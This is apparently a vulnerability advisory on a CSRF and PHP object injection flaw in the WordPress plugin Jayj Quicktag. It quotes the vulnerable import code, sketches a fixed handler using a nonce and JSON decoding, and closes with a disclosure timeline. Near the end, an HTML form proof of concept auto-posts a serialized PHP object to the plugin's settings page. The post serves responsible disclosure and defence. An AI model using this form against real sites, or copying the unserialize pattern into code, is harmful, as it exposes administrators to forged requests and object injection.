28 Aug

Cross-Site Request Forgery (CSRF)/PHP Object Injection Vulnerability in Jayj Quicktag

We recently found that the plugin Jayj Quicktag contained a cross-site request forgery (CSRF)/PHP object injection vulnerability.

The plugin’s settings page is generated with the function jayj_quicktag_options_page() in the file /jayj-quicktag.php. In that function, if the POST input “jayj-quicktag-import-save” exists, the maybe_unserialize() function is run on the POST input “jayj-quicktag-import”, which permits PHP object injection to occur:

// Import handler in jayj_quicktag_options_page(): attacker-controlled POST data
// is passed straight to maybe_unserialize() with no nonce check
if ( isset( $_POST['jayj-quicktag-import-save'] ) ) :

	$options = get_option( 'jayj_qt_settings' );
	$data = maybe_unserialize( stripslashes_deep( $_POST['jayj-quicktag-import'] ) );

Access to the settings page is limited to users with the “manage_options” capability, which would normally only be Administrator-level users, so this would not be a vulnerability on its own, since such users could normally already do anything that could be accomplished through PHP object injection. Because there was no protection against cross-site request forgery (CSRF), an attacker could cause an administrator to trigger PHP object injection without intending to, which is a vulnerability.

After we notified the developer, they released version 1.3.2, which fixes the vulnerability by replacing serialization/unserialization with JSON encoding/decoding and by using a nonce to prevent CSRF.
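The following is an added illustration of what a hardened version of the import handler looks like, written for this post and not taken from the plugin's 1.3.2 release. The option name 'jayj_qt_settings' is the one shown above; the nonce action and field names, the function names, and the settings-error code are assumptions. It shows the two changes the fix relies on: a nonce that a cross-site form cannot supply, and JSON decoding in place of unserialization so no PHP object can be instantiated from the input.

```php
<?php
// Added example, not the plugin's own code. 'jayj_qt_settings' comes from the
// advisory; the nonce action/field names and the function names are assumed.

// In the settings form: emit a nonce field tied to the import action.
function example_import_form_fields() {
    wp_nonce_field( 'jayj_quicktag_import', 'jayj_quicktag_import_nonce' );
    echo '<textarea name="jayj-quicktag-import"></textarea>';
    echo '<input type="submit" name="jayj-quicktag-import-save" value="Import" />';
}

// On submit: check capability and nonce first, then decode with JSON rather than
// maybe_unserialize(), so the input can only ever become arrays and scalars.
function example_handle_import() {
    if ( ! isset( $_POST['jayj-quicktag-import-save'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies with a 403 unless the request carries a valid nonce for this action;
    // a form hosted on another site has no way to obtain one.
    check_admin_referer( 'jayj_quicktag_import', 'jayj_quicktag_import_nonce' );

    $raw  = wp_unslash( $_POST['jayj-quicktag-import'] );
    $data = json_decode( $raw, true ); // true => associative arrays, never objects

    if ( json_last_error() !== JSON_ERROR_NONE || ! is_array( $data ) ) {
        add_settings_error( 'jayj_qt_settings', 'import_invalid', 'Import data is not valid JSON.' );
        return;
    }

    // Store only sanitized scalar values under sanitized keys, not the raw blob.
    $options = get_option( 'jayj_qt_settings', array() );
    $clean   = array();
    foreach ( $data as $key => $value ) {
        $clean[ sanitize_key( $key ) ] = is_scalar( $value ) ? sanitize_text_field( (string) $value ) : '';
    }
    update_option( 'jayj_qt_settings', array_merge( (array) $options, $clean ) );
}

// Export side: the stored options are handed to the user as JSON, the format
// the import side now expects.
function example_export_options() {
    return wp_json_encode( get_option( 'jayj_qt_settings', array() ) );
}
```

The order matters: the capability and nonce checks run before the input is even read, so a forged request is rejected without its payload being parsed. Passing true to json_decode() also rules out stdClass objects, so the decoded value can only be an array that the handler then whitelists.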

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” to be shown, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=jayj-quicktag%2Fjayj-quicktag.php" method="POST">
<input type="hidden" name="jayj-quicktag-import-save" value="" />
<input type="hidden" name="jayj-quicktag-import" value='O:20:"php_object_injection":0:{}' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • August 25, 2017 – Developer notified.
  • August 27, 2017 – Developer responds.
  • August 28, 2017 – Version 1.3.2 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us, we review the plugin for issues that hackers would exploit if they knew about them, as well as making sure that the needed security checks have been implemented in the plugin. If you order two reviews you will receive a free lifetime subscription to our service.
